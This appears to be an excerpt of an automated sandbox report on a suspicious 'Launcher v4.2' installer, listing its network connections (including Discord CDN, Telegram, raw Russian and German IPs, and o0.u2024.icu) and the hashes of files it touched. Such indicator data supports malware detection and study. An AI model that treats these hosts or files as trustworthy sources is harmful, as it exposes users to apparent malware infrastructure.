| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | goo.su | udp |
| US | 104.21.38.221:443 | goo.su | tcp |
| US | 104.21.38.221:443 | goo.su | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 221.38.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| US | 8.8.8.8:53 | 145.77.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| DE | 88.198.89.4:80 | 88.198.89.4 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.89.198.88.in-addr.arpa | udp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | o0.u2024.icu | udp |
| FI | 95.217.245.123:443 | o0.u2024.icu | tcp |
| US | 8.8.8.8:53 | 123.245.217.95.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FI | 95.217.245.123:443 | o0.u2024.icu | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 9622e603d436ca747f3a4407a6ca952e |
| SHA1 | 297d9aed5337a8a7290ea436b61458c372b1d497 |
| SHA256 | ace0e47e358fba0831b508cd23949a503ae0e6a5c857859e720d1b6479ff2261 |
| SHA512 | f774c5c44f0fcdfb45847626f6808076dccabfbcb8a37d00329ec792e2901dc59636ef15c95d84d0080272571542d43b473ce11c2209ac251bee13bd611b200a |
\??\pipe\LOCAL\crashpad_2648_OYZQKJLYLAVZQJHP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 04b60a51907d399f3685e03094b603cb |
| SHA1 | 228d18888782f4e66ca207c1a073560e0a4cc6e7 |
| SHA256 | 87a9d9f1bd99313295b2ce703580b9d37c3a68b9b33026fdda4c2530f562e6a3 |
| SHA512 | 2a8e3da94eaf0a6c4a2f29da6fec2796ba6a13cad6425bb650349a60eb3204643fc2fd1ab425f0251610cb9cce65e7dba459388b4e00c12ba3434a1798855c91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7d3249868be478c487030a655bab6a9a |
| SHA1 | c49906195f0dc331af7f3ce2adde5b69e50bdc71 |
| SHA256 | 735dc69fd38b5cf72a604070ae0ca360f65e66e46c689eac0bf96f2cf6d23254 |
| SHA512 | f4ccc65dbd478e378a2a2f7657463aef0f7c4fbf04da7132b386e276fa3cc9a21f3c174a78c46e12786285272a10e83b6c0ec4ddbb131a99c1cc9298705f3c89 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1c44d5a38a3fe962715d84f9fad1a759 |
| SHA1 | bab834d52b4ee893b815f74890204d106e55529a |
| SHA256 | e733f286e87d456f057ebb411829958ace00b759dad2d52cda749da103b17405 |
| SHA512 | 04e49e49321eefb3b8002717c93afeff7c19f93d560ea92c8905a8b804090fc9554b18fec82f1ee958c4bdf0a3f89c98e7d798525474c4256f57a7036fb2baf8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | eadd9a2c4c8a1fdf11be37ee96719f8c |
| SHA1 | 1e4a121f338a4f486b15511284da78a41530c071 |
| SHA256 | a243894ea6f50c5cf778d918d81bccc0703fadec5cf43f7f60fc69750b6929ae |
| SHA512 | 471bf25e8fe02dfbbeccc4be2db7627d256785fd10df42d9a67360bdf286d507069cae80bb7cabe6eb0fdf2d37fb8a666d61c83c75d2fe4ae319228c199808c0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
| MD5 | 151fb811968eaf8efb840908b89dc9d4 |
| SHA1 | 7ec811009fd9b0e6d92d12d78b002275f2f1bee1 |
| SHA256 | 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed |
| SHA512 | 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6d0db6fe35c06bf21a6a2e7d2b45f4dd |
| SHA1 | b0323c97d641300615c16f2b9044fcb445e30ad9 |
| SHA256 | 804b6b01d08965ceff6461a198012a2e996455bc882014097e6e4d4805d76c6b |
| SHA512 | cee8cbd647163342f69f5b3f5bf74386112afe9685b922324e75039f02e6416251e28f78d56790836d901718d6937b2a244e069771b04d63ed9e65e6f3cef00e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ce4ed78844b038e3a4b57cd2e6729215 |
| SHA1 | b605590c2a0e7bd25792aafb3c91cf955d37a987 |
| SHA256 | 4b07bbab67ec43331ca8efb2ec0cbb5b307e579128c37aef122ef54d3cd5cdbb |
| SHA512 | 1a63ae909a249f4565e50228c71b132e2464091e01f7481c96e7f59467392f7e4d41262664505db2ff1f462eb68cfb2330d9c60641d734090743d76f9686d7ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 07834d957e9db61752bde6b9d507ff07 |
| SHA1 | 3193a877478f386788a6e4a9a50ed11deb8f1c78 |
| SHA256 | 78c6508807a6145a7cb76517403d918ccf09b80f596a8979aa540eb6f16ef68a |
| SHA512 | e62c120d893a280d4f366779417b510436bff3b66f5d7d7f86146ce8fe9bf97afb22ace08f5a75b20a616543926854789edd4fc23bc4ca2c1c6b65ad6d1132cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 113d3bef53ad0fe92767c5353eb61d13 |
| SHA1 | a8ed61eeabf9ee0be32d799bc014d1db3cfc7836 |
| SHA256 | 0d857d0e668469c56a442adf132d466b569726085d5a2d394ab4c5d4f7d77c73 |
| SHA512 | 20a0312a07971f86d5752d126234d2f6578a4f928137558e70b3722b50fb93f43bb67e79eda3a4c82e08056040667f6c62086bfe20af1bd583fab500c435eab9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5982d2.TMP
| MD5 | ef753a6dcde66a9cf358cce6c47c0407 |
| SHA1 | 3c88cdb5bb7b4e92092137fd6b65cf7a78e6b907 |
| SHA256 | 041e43da865451c71ea353dd33a1fa61b011c5ed9362d216929337043c93418a |
| SHA512 | b4568679b3a29977d55074014cbf07f769218b945e59765e075e46659fdd86f24d8436e07751a4e331ac9397ce494a62cfdeb410aa9140ddf5c70721dabbcbf9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 25d4dfea2c5d1ec01a841755b168eb00 |
| SHA1 | 6f3ec83c88adda1c61f008397348abda56d5164c |
| SHA256 | 42cf79e5a9257950ecda9a93f144f436588c33df11879fa2bb5479ea5062cd65 |
| SHA512 | 5f0f69e7f9cf6bbeaffb7d2cfcd2a2bc20e0889758364369165360b3b50e2e649061ee6d61cc354861e76865826091695b5fda4b755e3ab6765074b4df6998ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff9c128083314518649d92d5eb904602 |
| SHA1 | 59226df9bc410048882e19adc9ebb2e1a11881e6 |
| SHA256 | b25f29433ffb54afb13342f5a8c5827c4929e274eafecd4b59aaa57bf3f99cde |
| SHA512 | f9ad3598e9388bde0fafe86b1fd639d1e414178d4c897ba051b8570a897c622dfa6ea3839644d212d0555dbaf494d2d56f72883099051dcdac314bf32f4b9190 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 0e898a781dea968b2126642372b5b161 |
| SHA1 | 6555099283eb9c16415a049fd9d09dc564092503 |
| SHA256 | c6bcb51eab14871a82e06f8011460eb5a78be3d33b8e1e3ab3b865ffe0ecb073 |
| SHA512 | 10f77253b25fde909b1af50872de885a54807ae8829f95c0088deb46dfc80c13481d8b447c7f96b24553df11eaae01a616f342a65f550a31b2638c9a207b9763 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 2892eee3e20e19a9ba77be6913508a54 |
| SHA1 | 7c4ef82faa28393c739c517d706ac6919a8ffc49 |
| SHA256 | 4f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2 |
| SHA512 | b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e0a7432bc3b97f73ebf8200fc3fcbc99 |
| SHA1 | a8afdc14a57c57f05087d16489f847032633186d |
| SHA256 | 10a08849288a8a78c375e2b6b1edf70eea438e901e537cb2f65206505d0bcc29 |
| SHA512 | 628966a91530482c805a83ac5545329e30e87c60485c997ace90a6b7cd3a7b1214746bd30d8270e8dfd39a768ee9c0d7030f79ad9af09962a57fc222e00ab4f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ef8d773d27a92fc6f320f6415d9fd31d |
| SHA1 | 6af4f16cb965ca2a4e7a87c2e6534d74558cc2af |
| SHA256 | a4345051e3131065d282d7f3e80b94e30850a49a37a49d791f460dc98047af8f |
| SHA512 | e3da1f8ccd8c6bde4dbc3c28ac1e1bebaa033353f5b69297f7c52798a90dcfb177491eac55d37295bb5e0c36b78568a39952427e2bd2019d983974ce5fa47e0f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b5688004b4a4b9d8e69d485b1b53d5c2 |
| SHA1 | b0f31c745ee3550eb9814f3bec2b4d8893cf2e63 |
| SHA256 | 83b40f54933582221d908afdb1980038952c286482a71b05faf806acb3107d63 |
| SHA512 | 286514e4dfb0ebdb3245e59a0b3e4404aaf83d276508b3358db22912b2198423a415bc7eab9e551d207b68cb3b19dadee6e34f8da016aa418ee71bdef22b805b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c4916a961b5471047c2bf3f9988c88e5 |
| SHA1 | bcab14f462aad562b82c9d35e54c621f31672b2e |
| SHA256 | c3249559f2d7551526a8b27b64a578f72d4266938f37aa544aea6fce6be062ad |
| SHA512 | 6d8dae233e86a9c42e6918803bb6254bf9e5a1690789eefbc28806fe1ca4a446a5a8c6d2d9d456434f4058deb728474b8de254a151b5e53923e2115cf34d9a88 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b9a50a8f4c6e134642f4d04ba889643c |
| SHA1 | 50adc3f67b32888e3b69b28bab420bb955a6ddd3 |
| SHA256 | dd88832e95b44af8982632a6096c2d40ccb2862a72b5b7da6f2a3438acf8733c |
| SHA512 | 93fdf2642eff80c6c890f6935956afeaf507c0077bfb3205584e45ae56b36869ce53ea619f08a8e304c257e1054661b73ebd6ba62e6b811a6814984cb88907ab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ad4d2956d4f6f703fa75899077a87bc0 |
| SHA1 | e3be68197880a5a97794875d0dfac6c39bd566f0 |
| SHA256 | cedad7c066589eb137eacdc644043b4f2169fd0c2ff87dc9b0c10602da4f15ab |
| SHA512 | 6291eadfb7bce9c50cc151a4fd230b60320b62106615bf0ca84ba8f45f7b36201af86265ef8def6080b645e8596fba53ffd56a377871d9f101f3c898d19e2c25 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 9efd3626760dc755c6a365490d09d21b |
| SHA1 | a5bd0a4aba3a16d97991b547c3daca6e36b1c21f |
| SHA256 | c4948ea879d32873a8beb2268fa0656eee7679a0124c2084d3f5c5555c4577b3 |
| SHA512 | f1f8f47ff3379f3f06c72b7e93b79a24a45141b2bc1058ab7c866619af0c75d52418a5c90c54f5626480a90160b78478cbf8676ee7d07206563f85417e2fa9b2 |
C:\Users\Admin\Downloads\8314e443-e781-4c10-ba3d-4238e7afba2c.tmp
| MD5 | 9d37bf58374c5c462666febd817edc45 |
| SHA1 | 5645a0b0ab226298c662eeec28eeaffd240c8c23 |
| SHA256 | d885efb96a75cac2e4cd61042ed3c888c889853a26880b174cbec96586662f1b |
| SHA512 | f868a9573f4a4e1d4fb55599faa9f601025c89b7c195183db9efe51f7dc4a2b410fb5d88fadd0b065b377af29ac5e8a3e24c9af8749da77b5d1bf4d33e2a8062 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d19f485f65e2b6271b99d110e0ccd146 |
| SHA1 | ef7edb55b6cc4e45cc9b7fe0a1797b668f1afb9d |
| SHA256 | ff06c6843de0e04946771a90163b14863c8d5de472de4fa707bb004a642ab4be |
| SHA512 | d4d61d31193da771386274988c484f39be40032674d0d02f61a1a282735e94a57f929ba576079e4bac6f80452fda63cc95999d4652fac47e11460c9fe28424ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 210bb4a87d7fdfa5b4cf21d77bc1318a |
| SHA1 | 8fd7d6563e9b2fec81493bee6f291997aaa40042 |
| SHA256 | e65e3572948ab39db677ae4e06f92d382f268507ca6b83ff933adcca5639b2f5 |
| SHA512 | 2c273a3a723daeb89f3e9bd201e132ead55b8e217459d27265df9f7e4865e0ccc401e2d0fe3d268f59d4342fcce471c8e23a3bbb4dd1c61d818882533da5ae8d |
C:\Users\Admin\Downloads\Launcher v4.2\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
| MD5 | 1e9d8f133a442da6b0c74d49bc84a341 |
| SHA1 | 259edc45b4569427e8319895a444f4295d54348f |
| SHA256 | 1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b |
| SHA512 | 63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5d9a6b04ddf3f52922008d65dafe8431 |
| SHA1 | ad50ad0dabbcd56a080ac64a73431286824ae5b6 |
| SHA256 | ba24836b08e25003d49dc4899a36af6fd8870aa91fac682cf67cac863389ce1a |
| SHA512 | bf9d7a12fceb336d559da0634fa51dd63e504011ba486f17298f9fcd346515eace0c46347b156f0b1ef653f4489aca8f66d38b2d5ab95510ada0fdaad33ed078 |
C:\Users\Admin\Downloads\Launcher v4.2\Setup.exe
| MD5 | e2bceb0f202a3309489e5eb27419af5c |
| SHA1 | 60130f01b6204e0e301f38695d6169362b4ec165 |
| SHA256 | 0c4e6e52e622faf901d7a477462cfb02caabac09ab993f983b16dbeb12f1e7ab |
| SHA512 | 99e160dfd15409551021bbaf731a9c6ea7d887155184e80c8b20824b3df369e85f3452fafb6753fe41111d10ffe47309f81cdad1187664de00ac269caa249564 |
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe
| MD5 | 48c96771106dbdd5d42bba3772e4b414 |
| SHA1 | e84749b99eb491e40a62ed2e92e4d7a790d09273 |
| SHA256 | a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22 |
| SHA512 | 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c |
memory/5040-1251-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\msvcr100.dll
| MD5 | bf38660a9125935658cfa3e53fdc7d65 |
| SHA1 | 0b51fb415ec89848f339f8989d323bea722bfd70 |
| SHA256 | 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa |
| SHA512 | 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1 |
C:\Users\Admin\Downloads\Launcher v4.2\jre\lib\i386\jvm.cfg
| MD5 | 9fd47c1a487b79a12e90e7506469477b |
| SHA1 | 7814df0ff2ea1827c75dcd73844ca7f025998cc6 |
| SHA256 | a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e |
| SHA512 | 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3 |
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\client\jvm.dll
| MD5 | 39c302fe0781e5af6d007e55f509606a |
| SHA1 | 23690a52e8c6578de6a7980bb78aae69d0f31780 |
| SHA256 | b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc |
| SHA512 | 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77 |
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\java.dll
| MD5 | 73bd0b62b158c5a8d0ce92064600620d |
| SHA1 | 63c74250c17f75fe6356b649c484ad5936c3e871 |
| SHA256 | e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30 |
| SHA512 | eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f |
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\zip.dll
| MD5 | cb99b83bbc19cd0e1c2ec6031d0a80bc |
| SHA1 | 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd |
| SHA256 | 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec |
| SHA512 | 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba |
C:\Users\Admin\Downloads\Launcher v4.2\jre\lib\meta-index
| MD5 | 91aa6ea7320140f30379f758d626e59d |
| SHA1 | 3be2febe28723b1033ccdaa110eaf59bbd6d1f96 |
| SHA256 | 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4 |
| SHA512 | 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb |
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\verify.dll
| MD5 | de2167a880207bbf7464bcd1f8bc8657 |
| SHA1 | 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7 |
| SHA256 | fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3 |
| SHA512 | bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322 |
C:\Users\Admin\Downloads\Launcher v4.2\jre\lib\ext\meta-index
| MD5 | 77abe2551c7a5931b70f78962ac5a3c7 |
| SHA1 | a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc |
| SHA256 | c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4 |
| SHA512 | 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\activation.jar
| MD5 | 46a37512971d8eca81c3fcf245bf07d2 |
| SHA1 | 485de3a253e23f645037828c07f1d7f1af40763a |
| SHA256 | ae475120e9fcd99b4b00b38329bd61cdc5eb754eee03fe66c01f50e137724f99 |
| SHA512 | 49119b0cc3af02700685a55c6f15e6d40643f81640e642b9ea39a59e18d542f8837d30b43b5be006ce1a98c8ec9729bb2165c0442978168f64caa2fc6e3cb93d |
C:\Users\Admin\Downloads\Launcher v4.2\lib\antlr4-runtime.jar
| MD5 | b79f55024206b39be2539e1ecfde0c0a |
| SHA1 | 30b13b7efc55b7feea667691509cf59902375001 |
| SHA256 | 2a61943f803bbd1d0e02dffd19b92a418f83340c994346809e3b51e2231aa6c0 |
| SHA512 | b3f10ddf9340bbfa8c09fdbd27b72fdedb9ec53a3a117c08067665e6598b8386831c1e0cfc3518c6e85630dc6473a60264ac08e03a71df6b1d967a84b911cc5a |
C:\Users\Admin\Downloads\Launcher v4.2\lib\jkeymaster.jar
| MD5 | 21a017201cbb16ae0546069d4371f1c2 |
| SHA1 | 9f1e8c9341a8a0c51299b961c4f6c7661c822756 |
| SHA256 | a2d68aaf08f15ff1c3b9b224641e8b4c35ee30b10f655d6420571b0429f19c87 |
| SHA512 | 6c65740c17de72ba7b0df95aa29d095a1502f298924c63f364328f6fbb38920e92e0246d28a642f7c9fe3ab582341e607b0ae01515d470b4595d698ce81363d6 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\jfoenix.jar
| MD5 | 6316f84bc78d40b138dab1adc978ca5d |
| SHA1 | b12ea05331ad89a9b09937367ebc20421f17b9ff |
| SHA256 | d637e3326f87a173abd5f51ac98906a3237b9e511d07d31d6aafcf43f33dac17 |
| SHA512 | 1cdca01ed9c2bc607207c8c51f4b532f4153e94b3846308332eccae25f9c5fddf8279e3063f44a75dd43d696eab0f9f340f9bf2f3ec805ab0f2f1de5135a426c |
C:\Users\Admin\Downloads\Launcher v4.2\lib\jaybird-jdk18.jar
| MD5 | 65fd53fa5795d63c869c37cb1a08cb30 |
| SHA1 | 79d1a6e97f8ed4a3f1341d5672dbd027a4ba0007 |
| SHA256 | a012722091bdbf995c4b3bad8d1145bb127f92ece7bdc1491b35e3151461270c |
| SHA512 | 384d2f5a204c0c0fff47beca0a3d8f6ba82f261bc7c6b5e65d75541b710cc5a42775a73a8317f0e52284b8a6df02b25ae636f42eab73d9994b34a97419c99750 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\javassist-GA.jar
| MD5 | 60974bfbf014085986b1d1eac44222c8 |
| SHA1 | 50120f69224dd8684b445a6f3a5b08fe9b5c60f6 |
| SHA256 | d19c1ef43ccd9cb1b39466bb2f1c8e45c2b6752f1e13a3dfb60096543d1791fa |
| SHA512 | f08d31069e208d1ecc2956445098dd54947db3c3f1cb719513b9660c152877d45a528482af937a58724b76f935d82849805ed2e6cb0161f06e9aab6a32389bc4 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\HikariCP-java6.jar
| MD5 | b23689090502fcf359784933ce2286d8 |
| SHA1 | 85725de79f42d0d5dd3ff2b6b8b88c944b5e09a3 |
| SHA256 | c9a447f70f876a2e56870ffa380caf1f26d949443494bdddb32c82c6e842bcbd |
| SHA512 | 424cf0032c85316edea5e9304aa9465add1a5b5ec6f129a2884ae623465b1515aa349b2c33854dd231cf19008462ed42038282e0c5b15db415ebad4dd1bab995 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\gson.jar
| MD5 | 5134a2350f58890ffb9db0b40047195d |
| SHA1 | 751f548c85fa49f330cecbb1875893f971b33c4e |
| SHA256 | 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32 |
| SHA512 | c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a |
C:\Users\Admin\Downloads\Launcher v4.2\lib\dyn4j.jar
| MD5 | a3dd06111bdc11bc4575845dc2fcc8f4 |
| SHA1 | 86b0aeeceeb4e6aaf32f290784bdf5c690a27d43 |
| SHA256 | 959539ea9621b1b35d866bc1ca2062de38daa1a3f49c7ea22d5b138671c38945 |
| SHA512 | ec709417cc92fdba8e8cd1e8f4b31da03967c8ef3ad1ee6068d25141a644eb7fb83beb0753bcbac9b83fcf0491621a50a9207a2352c3dabefdbf045f02e354ec |
C:\Users\Admin\Downloads\Launcher v4.2\lib\dn-php-sdk.jar
| MD5 | 3e5e8cccff7ff343cbfe22588e569256 |
| SHA1 | 66756daa182672bff27e453eed585325d8cc2a7a |
| SHA256 | 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4 |
| SHA512 | 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\dn-compiled-module.jar
| MD5 | 8c9b437c97378efb2aa9561bacd9a405 |
| SHA1 | addccf32885a2f54181f8f196132b0729140ce7d |
| SHA256 | d3d8132814e0052507063a0065b987a0536fb73bd7d0b5c8637e6283bbbb2900 |
| SHA512 | 5553df1beaacc33458dbf99c42735be62b57eac5222880f7e31ffb34c74821c35b122fd1e9e62031d8be16970bcb449ff0343909bb917d208db9343f21406b77 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\connector-api.jar
| MD5 | ec91623be533b70ef73690ea540e7000 |
| SHA1 | a5cee35dc703a9d9ea305cc3f4a2baa7c4919145 |
| SHA256 | 22f801b1fff9c1f84090085b935e024861f555dec06b33dc2c85d14dacad1a5f |
| SHA512 | 7aaf55664f0240655fc1d36582c6851003f4cdb1803f4cf813183a9179e1c6a567e4ad3f47af8e441a03bfddcbc86a815c17d2612dba725cdb507e8445574c92 |
C:\Users\Admin\Downloads\Launcher v4.2\lib\commons-email.jar
| MD5 | f045afea3cb27ead50b0c59fc3f0dffd |
| SHA1 | c1a7133db9008fa1eae082e6158c3f4c128ec27e |
| SHA256 | 268253139a8936afa68909df8ced52a9d769665ee9373a60e19a93f254fd54b5 |
| SHA512 | 0e2d2cbef9d4c19310748e37ad909e57aa37490a7dfd41557b1914857fe7235e434a6fdee00f663688941da3e70fe882b5c63df10ba8c7ad18936959f906722b |
C:\Users\Admin\Downloads\Launcher v4.2\lib\asm-all.jar
| MD5 | f5ad16c7f0338b541978b0430d51dc83 |
| SHA1 | 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a |
| SHA256 | 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d |
| SHA512 | 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a |
C:\Users\Admin\Downloads\Launcher v4.2\lib\jphp-app-framework.jar
| MD5 | 0c8768cdeb3e894798f80465e0219c05 |
| SHA1 | c4da07ac93e4e547748ecc26b633d3db5b81ce47 |
| SHA256 | 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669 |
| SHA512 | 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106 |
